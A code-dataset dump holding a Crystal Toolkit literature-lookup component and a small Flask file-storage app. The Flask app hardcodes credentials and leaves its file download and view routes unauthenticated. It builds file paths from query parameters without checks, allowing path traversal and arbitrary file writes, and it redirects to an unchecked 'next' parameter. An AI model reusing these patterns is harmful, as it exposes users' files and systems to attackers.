"pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "33439126042", "text": "import dash_core_components as dcc\nimport dash_html_components as html\n\nfrom dash.dependencies import Input, Output, State\nfrom dash.exceptions import PreventUpdate\n\nfrom crystal_toolkit.components.core import PanelComponent, MPComponent\nfrom crystal_toolkit.helpers.layouts import Label, Tag\n\nfrom pymatgen import Structure, MPRester\n\nimport re\n\nfrom pybtex.database.input.bibtex import Parser\nfrom pybtex.plugin import find_plugin\nfrom pybtex.style.formatting.unsrt import sentence, field\nfrom io import StringIO\n\nfrom bibtexparser import loads\n\nfrom habanero import Crossref\nfrom habanero.cn import content_negotiation\n\nimport codecs\nimport latexcodec\n\nimport os\n\nCROSSREF_MAILTO = 
os.environ.get(\"CROSSREF_MAILTO\", None)\n\nclass LiteratureComponent(PanelComponent):\n def __init__(self, *args, use_crossref=True, use_crossref_formatting=True, **kwargs):\n self.use_crossref = use_crossref\n self.use_crossref_formatting = use_crossref_formatting\n super().__init__(*args, **kwargs)\n\n @MPComponent.cache.memoize(timeout=self.mprester_cache_timeout)\n def get_materials_id_references(mpid):\n with MPRester() as mpr:\n references = mpr.get_materials_id_references(mpid)\n return references\n self.get_materials_id_references = get_materials_id_references\n\n @MPComponent.cache.memoize(timeout=0)\n def format_bibtex_references(references, use_crossref=True, custom_formatting=True):\n self._format_bibtex_references(references, use_crossref=use_crossref,\n custom_formatting=custom_formatting)\n self.format_bibtex_references = format_bibtex_references\n self.format_bibtex_references = format_bibtex_references\n\n @property\n def title(self):\n return \"Literature Mentions\"\n\n @property\n def description(self):\n return (\n \"The material loaded into Crystal Toolkit is matched against \"\n \"materials and their associated references in the Material \"\n \"Project database.\"\n )\n\n @property\n def loading_text(self):\n return \"Looking up journal entries. This is not currently pre-cached so may take up to a minute\"\n\n @staticmethod\n def _pybtex_entries_to_markdown(entries):\n \"\"\"Utility function to convert a BibTeX entries containing\n references into a Markdown string. Borrowed from propnet.\n \"\"\"\n\n # TODO: replace this, very messy\n\n Pybtex_style = find_plugin(\"pybtex.style.formatting\", \"plain\")()\n\n # hack so as to avoid messing with capitalization of formulae\n def format_title(self, e, which_field, as_sentence=True):\n formatted_title = field(which_field)\n if as_sentence:\n return sentence[formatted_title]\n else:\n return formatted_title\n\n Pybtex_style.format_title = format_title\n pybtex_style = Pybtex_style()\n\n Pybtex_md_backend = find_plugin(\"pybtex.backends\", \"markdown\")\n\n # hack to not print labels (may remove this later)\n def write_entry(self, key, label, text):\n self.output(\"%s\" % text)\n\n Pybtex_md_backend.write_entry = write_entry\n Pybtex_md_backend.symbols[\"newblock\"] = \" \\n>\"\n pybtex_md_backend = Pybtex_md_backend()\n\n entries_formatted = pybtex_style.format_entries(entries.values())\n output = StringIO()\n pybtex_md_backend.write_to_stream(entries_formatted, output)\n\n # add blockquote style\n references_md = \" \\n \\n\".join(\n [f\"> {md} \" for md in output.getvalue().split(\"\")]\n )\n\n return references_md\n\n @staticmethod\n def _bibtex_entry_to_author_text(entry, et_al_cutoff=3):\n entry = loads(entry).entries[0]\n if \"author\" not in entry:\n return \"\"\n authors = codecs.decode(entry[\"author\"], \"ulatex\")\n authors = re.sub(r\"\\s*{.*}\\s*\", \" \", authors).replace(\"{}\", \"\")\n authors = authors.split(\" and \")\n if len(authors) > et_al_cutoff:\n authors = authors[0:et_al_cutoff]\n if len(authors) > 1:\n return \", \".join(authors[0:-1]) + \" and \" + authors[-1]\n else:\n return \"\"\n\n @staticmethod\n def _item_to_journal_div(item):\n # journal, issue, volume, date-parts (year), pages\n\n contents = []\n\n if item[\"journal\"]:\n contents.append(html.I(item['journal']))\n else:\n return html.Div()\n\n if item[\"volume\"]:\n contents.append(html.Span(\", \"))\n contents.append(html.B(item['volume']))\n\n if item[\"issue\"]:\n contents.append(html.Span(f\" ({item['issue']})\"))\n\n if 
item[\"pages\"]:\n contents.append(html.Span(f\", {item['pages']}.\"))\n else:\n contents.append(html.Span(f\".\"))\n\n if item[\"date-parts\"][0]:\n contents.append(html.Span(f\" {item['date-parts'][0][0] }.\"))\n\n return html.Div(contents, style={\"display\": \"inline-block\"})\n\n def _get_references_for_mpid(self, use_crossref=True, custom_formatting=True):\n return ...\n\n def update_contents(self, new_store_contents):\n \"\"\"\n Structure -> mpid -> BibTeX references from MP -> (optional doi lookup\n via Crossref) -> formatting.\n Formatting is very messy right now.\n DOI lookup and (possibly) formatting should be cached in a builder.\n \"\"\"\n\n struct = self.from_data(new_store_contents)\n\n if not isinstance(struct, Structure):\n raise PreventUpdate(\n \"Literature mentions can only be retrieved for crystallographic \"\n \"structures at present and not molecules. Please make a feature \"\n \"request if this would be useful for you, and it will be \"\n \"prioritized.\"\n )\n\n with MPRester() as mpr:\n mpids = mpr.find_structure(struct)\n\n if len(mpids) == 0:\n raise PreventUpdate(\n \"No structures in the Materials Project database match this \"\n \"crystal structure, so literature mentions cannot be retrieved. \"\n \"Please submit this structure to Materials Project if you'd \"\n \"like it to be added to the Materials Project database.\"\n )\n\n all_references = []\n for mpid in mpids:\n all_references.append(mpr.get_materials_id_references(mpid))\n self.logger.debug(f\"Retrieved references for {mpid}.\")\n\n if self.use_crossref:\n\n cr = Crossref(mailto=CROSSREF_MAILTO)\n individual_references = set()\n for references in all_references:\n individual_references.update(set(references.split(\"\\n\\n\")))\n\n # exclude Materials Proect references (these are intended to be\n # references for the structure specifically)\n refs_to_remove = set()\n for ref in individual_references:\n if \"Jain2013\" in ref:\n refs_to_remove.add(ref)\n individual_references -= refs_to_remove\n\n works = [cr.works(query=ref, limit=1) for ref in individual_references]\n self.logger.debug(f\"Retrieved {len(works)} works from Crossref.\")\n\n items = [\n work[\"message\"][\"items\"][0]\n for work in works\n if len(work[\"message\"][\"items\"]) > 0\n ]\n\n dois_to_item = {\n item[\"DOI\"]: {\n \"cited-by\": item.get(\"is-referenced-by-count\", 0),\n \"score\": item[\"score\"],\n \"title\": item.get(\"title\", None),\n \"authors\": item.get(\"author\", []),\n \"journal\": item.get(\"container-title\", [None])[0],\n \"issue\": item.get(\"issue\", None),\n \"volume\": item.get(\"volume\", None),\n \"pages\": item.get(\"page\", None),\n \"date-parts\": item.get(\"issued\", {}).get(\"date-parts\", [[None]]),\n }\n for item in items\n if item[\"score\"] > 40\n }\n\n num_refs = len(dois_to_item)\n sorted_dois = sorted(\n list(dois_to_item.keys()),\n key=lambda doi: -dois_to_item[doi][\"cited-by\"],\n )\n\n if self.use_crossref_formatting:\n # use Crossref to retrieve pre-formatted text\n\n # remove leading \"1. 
\" from Science CSL style\n refs = {\n doi: content_negotiation(ids=doi, format=\"text\", style=\"science\")[\n 3:\n ]\n for doi in dois_to_item.keys()\n }\n self.logger.debug(\n f\"Retrieved {len(refs)} formatted references from Crossref.\"\n )\n md = \" \\n\\n\".join(\n f\"> [{refs[doi]}](https://dx.doi.org/{doi}) \"\n f\"Cited by {dois_to_item[doi]['cited-by']}.\"\n for doi in sorted_dois\n )\n formatted_references = dcc.Markdown(\n md, className=\"mpc-markdown\"\n )\n\n else:\n # else retrieve BibTeX entries to extract a nice author list\n # and perform our own formatting\n\n entries = {\n doi: content_negotiation(ids=doi, format=\"bibtex\")\n for doi in sorted_dois\n }\n\n formatted_entries = []\n for doi, entry in entries.items():\n author_string = self._bibtex_entry_to_author_text(entry)\n journal_div = self._item_to_journal_div(dois_to_item[doi])\n\n formatted_entries.append(\n html.Blockquote(\n [\n html.A(\n [\n html.Div(\n [\n html.I(\n # necessary since titles can contain HTML for superscripts etc.\n dcc.Markdown(\n dois_to_item[doi][\"title\"],\n dangerously_allow_html=True\n )\n )\n ]\n ),\n html.Div([author_string]),\n html.Div(\n [\n journal_div,\n html.Span(\n f\" Cited by {dois_to_item[doi]['cited-by']}.\"\n ),\n ]\n ),\n ],\n href=f\"https://dx.doi.org/{doi}\",\n )\n ],\n className=\"mpc\",\n style={\"padding-left\": \"1rem\", \"margin-bottom\": \"1rem\"}\n )\n )\n\n formatted_references = html.Div(formatted_entries)\n else:\n # this uses pybtex directly on stored BibTeX entries from MP\n # most-accurate references and faster since no Crossref lookup\n # is required but no dois/hyperlinks available\n all_entries = {}\n for references in all_references:\n all_entries.update(Parser().parse_string(references).entries)\n md = self._pybtex_entries_to_markdown(all_entries)\n formatted_references = dcc.Markdown(md, className=\"mpc-markdown\")\n num_refs = len(all_entries)\n\n return html.Div(\n [\n Label(f\"{num_refs} references found{':' if num_refs>0 else '.'}\"),\n formatted_references,\n ],\n style={\"max-height\": \"20rem\", \"overflow-y\": \"scroll\"},\n )\n", "repo_name": "mattmcdermott/synthesis-app", "sub_path": "crystal_toolkit/components/literature.py", "file_name": "literature.py", "file_ext": "py", "file_size_in_byte": 12526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "crystal_toolkit.components.core.PanelComponent", "line_number": 31, "usage_type": "name"}, {"api_name": "pymatgen.MPRester", "line_number": 39, "usage_type": "call"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache.memoize", "line_number": 37, "usage_type": "call"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache", "line_number": 37, "usage_type": "attribute"}, {"api_name": "crystal_toolkit.components.core.MPComponent", "line_number": 37, "usage_type": "name"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache.memoize", "line_number": 44, "usage_type": "call"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache", "line_number": 44, "usage_type": "attribute"}, {"api_name": "crystal_toolkit.components.core.MPComponent", "line_number": 44, "usage_type": "name"}, {"api_name": "pybtex.plugin.find_plugin", "line_number": 75, "usage_type": "call"}, {"api_name": "pybtex.style.formatting.unsrt.field", "line_number": 79, 
"usage_type": "call"}, {"api_name": "pybtex.style.formatting.unsrt.sentence", "line_number": 81, "usage_type": "name"}, {"api_name": "pybtex.plugin.find_plugin", "line_number": 88, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 99, "usage_type": "call"}, {"api_name": "bibtexparser.loads", "line_number": 111, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 115, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 131, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 133, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 136, "usage_type": "call"}, {"api_name": "dash_html_components.B", "line_number": 137, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 145, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 150, "usage_type": "call"}, {"api_name": "pymatgen.Structure", "line_number": 165, "usage_type": "argument"}, {"api_name": "dash.exceptions.PreventUpdate", "line_number": 166, "usage_type": "call"}, {"api_name": "pymatgen.MPRester", "line_number": 173, "usage_type": "call"}, {"api_name": "dash.exceptions.PreventUpdate", "line_number": 177, "usage_type": "call"}, {"api_name": "habanero.Crossref", "line_number": 191, "usage_type": "call"}, {"api_name": "habanero.cn.content_negotiation", "line_number": 240, "usage_type": "call"}, {"api_name": "dash_core_components.Markdown", "line_number": 253, "usage_type": "call"}, {"api_name": "habanero.cn.content_negotiation", "line_number": 262, "usage_type": "call"}, {"api_name": "dash_html_components.Blockquote", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_html_components.A", "line_number": 274, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 276, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 278, "usage_type": "call"}, {"api_name": "dash_core_components.Markdown", "line_number": 280, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 287, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 288, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 305, "usage_type": "call"}, {"api_name": "pybtex.database.input.bibtex.Parser", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_core_components.Markdown", "line_number": 314, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 317, "usage_type": "call"}, {"api_name": "crystal_toolkit.helpers.layouts.Label", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "8560168722", "text": "from flask import Flask, jsonify, request, render_template, redirect, url_for,send_from_directory,send_file,render_template_string\n# from flask_jwt import JWT, jwt_required, current_identity\n# from flask_httpauth import HTTPDigestAuth\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user \n# from flask_login import LoginManager, UserMixin, login_required, login_user\nfrom werkzeug.security import 
safe_str_cmp\nimport os\nimport json\nuser_name = \"denver\"\npass_word = \"am3plus\"\napp = Flask(__name__)\napp.config[\"UPLOADS\"] = \"storage/\"+user_name+\"/\"\napp.debug = True\napp.config['SECRET_KEY'] = 'super-secret'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = \"login\"\n\nclass User(UserMixin):\n\n def __init__(self, id):\n self.id = id\n self.name = user_name\n self.password = pass_word\n \n def __repr__(self):\n return \"%d/%s/%s\" % (self.id, self.name, self.password)\n\n\n# create some users with ids 1 to 20 \nusers = [User(id) for id in range(1, 21)]\n\n# auth = HTTPDigestAuth()\n\n# users = {\n# \"d\": \"d\",\n# \"susan\": \"bye\"\n# }\n\n# @auth.get_password\n# def get_pw(username):\n# if username in users:\n# return users.get(username)\n# return None\n@app.route(\"/upload-image\", methods=[\"GET\", \"POST\"])\n@login_required\ndef upload_image():\n if request.method == \"POST\":\n if request.files:\n image = request.files[\"image\"]\n print(image)\n image.save(os.path.join(app.config[\"UPLOADS\"], image.filename))\n return redirect(request.url) \n return render_template(\"upload_image.html\")\n# @auth.login_required\n\n@app.route(\"/\")\n@login_required\ndef main_page():\n return render_template(\"index.html\")\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404 \n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n else:\n if request.form[\"password\"] == pass_word and request.form[\"login\"] == user_name:\n id = request.form[\"login\"]\n user = User(id)\n login_user(user)\n next = str(request.args.get('next'))\n if next != \"None\":\n print(next)\n return redirect(next)\n else: \n return redirect(\"/\")\n else:\n return render_template(\"login.html\", warning=\"Data incorrect!\")\n # if request.form[\"login\"] == \"denver\" and request.form[\"password\"] == \"am3plus\":\n # logged = 1\n # return redirect(\"/\")\n # else:\n # return render_template(\"login.html\", warning=\"Data incorrect!\")\n# @app.route('/uploads/', methods=['GET', 'POST'])\n# @login_required\n# def download(filename):\n# # Appending app path to upload folder path within app root folder\n# uploads = os.path.join(app.root_path, \"storage/avoccudleeee/\")\n# # Returning file from appended path\n# return send_from_directory(directory=uploads, filename=filename)\n@app.route('/uploads/', methods=['GET', 'POST'])\n# @login_required\ndef download():\n reponame = request.args.get('repo')\n filename = request.args.get('file')\n uploads = os.path.join(app.root_path, \"storage/\"+reponame+\"/\")\n print(uploads+filename)\n # return send_from_directory(directory=uploads, filename=str(filename))\n return send_file(uploads+filename, as_attachment=True)\n@app.route('/view-image/', methods=['GET', 'POST'])\n# @login_required\ndef view_image():\n reponame = request.args.get('repo')\n filename = request.args.get('file')\n uploads = os.path.join(app.root_path, \"storage/\"+reponame+\"/\")\n # print(uploads+filename)\n g = uploads+filename\n # return render_template(\"view_image.html\", image=str(g))\n return send_file(g, mimetype=\"image/png\")\n@app.route('/view-video/', methods=['GET', 'POST'])\n# @login_required\ndef view_video():\n reponame = request.args.get('repo')\n filename = request.args.get('file')\n uploads = os.path.join(app.root_path, \"storage/\"+reponame+\"/\")\n # 
print(uploads+filename)\n g = uploads+filename\n # return render_template(\"view_image.html\", image=str(g))\n return send_file(g, mimetype=\"video/mp4\")\n\n@app.route(\"/upload-file\", methods=[\"GET\", \"POST\"])\n@login_required\ndef upload_file():\n projects = os.listdir(\"storage/\")\n if request.method == \"POST\":\n if request.files:\n file = request.files[\"file\"]\n dsd = request.form.get(\"repos\")\n if os.path.exists(os.path.join(\"storage/\"+dsd+\"/\")):#, file.filename\n try:\n file.save(os.path.join(\"storage/\"+dsd+\"/\", file.filename))\n print(request.url[:-11]+\"view_repo?reponame=\"+dsd)\n return redirect((url_for(\"view_repo\")+\"?reponame=\"+dsd))\n except:\n return redirect((url_for(\"view_repo\")+\"?reponame=\"+dsd))\n else:\n os.mkdir(\"storage/\"+dsd+\"/\")\n file.save(os.path.join(\"storage/\"+dsd+\"/\", file.filename))\n return redirect((url_for(\"view_repo\")+\"?reponame=\"+dsd)) \n return render_template(\"upload_file.html\", proj=projects)\n\n@app.route(\"/create-repo\", methods=[\"GET\", \"POST\"])\n@login_required\ndef create_repo():\n if request.method == \"POST\":\n project_name = request.form.get('RepoName')\n if os.path.exists(os.path.join(\"storage/\"+project_name+\"/\")):\n return redirect(url_for(\"repo_list\"))\n else:\n os.mkdir(\"storage/\"+project_name)\n return redirect(url_for(\"repo_list\"))\n return render_template(\"new_repo.html\")\n\n@app.route(\"/list\", methods=[\"GET\", \"POST\"])\n@login_required\ndef repo_list():\n projects = os.listdir(\"storage/\")\n return render_template(\"repo_list.html\", data=projects)\n@app.route(\"/view_file\", methods=[\"GET\", \"POST\"])\n@login_required\ndef view_file():\n #?name=denver\n reponame = request.args.get('reponame')\n filename = request.args.get('filename')\n file = open(\"storage/\"+reponame+\"/\"+filename, 'r')\n data = file.read()\n file.close()\n #projects = os.listdir(\"storage/{}\".format(reponame))\n return render_template(\"view_file.html\", repo_name=reponame,data=data)\n@app.route(\"/view_repo\", methods=[\"GET\", \"POST\"])\n@login_required\ndef view_repo():\n #?name=denver\n reponame = request.args.get('reponame')\n projects = os.listdir(\"storage/{}\".format(reponame))\n return render_template(\"view_repo.html\",repo_name=reponame,data=projects)\n@app.route(\"/write-to-file\", methods=[\"GET\", \"POST\"])\n@login_required\ndef write_to_file():\n #?name=denver\n reponame = request.args.get('reponame')\n filename = request.args.get('filename')\n if request.method == \"GET\":\n return render_template(\"writee.html\",reponame=reponame,filename=filename)\n elif request.method == \"POST\":\n file = open(\"storage/\"+reponame+\"/\"+filename, 'w')\n file.write(request.form.get(\"code\"))\n file.close()\n return redirect(url_for(\".repo_list\"))\n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/login\")\n@login_manager.user_loader\ndef load_user(userid):\n return User(userid)\napp.run(host=\"0.0.0.0\",port=80)\n#http://127.0.0.1:5000/view_file?reponame=denver220&filename=main.txt", "repo_name": "denver-code/VSC-Denver", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7251, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_login.UserMixin", "line_number": 20, "usage_type": 
"name"}, {"api_name": "flask.request.method", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.url", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask_login.login_user", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "flask.send_file", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 
110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.send_file", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.send_file", "line_number": 124, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request.url", "line_number": 137, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 137, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 138, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 138, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 140, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 145, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 127, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 151, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 151, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": 
"os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 153, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 157, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 148, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 162, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 163, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 174, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 181, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 186, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 187, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 188, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 188, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 190, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 190, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 192, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 192, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 194, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 183, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 199, "usage_type": "call"}, {"api_name": 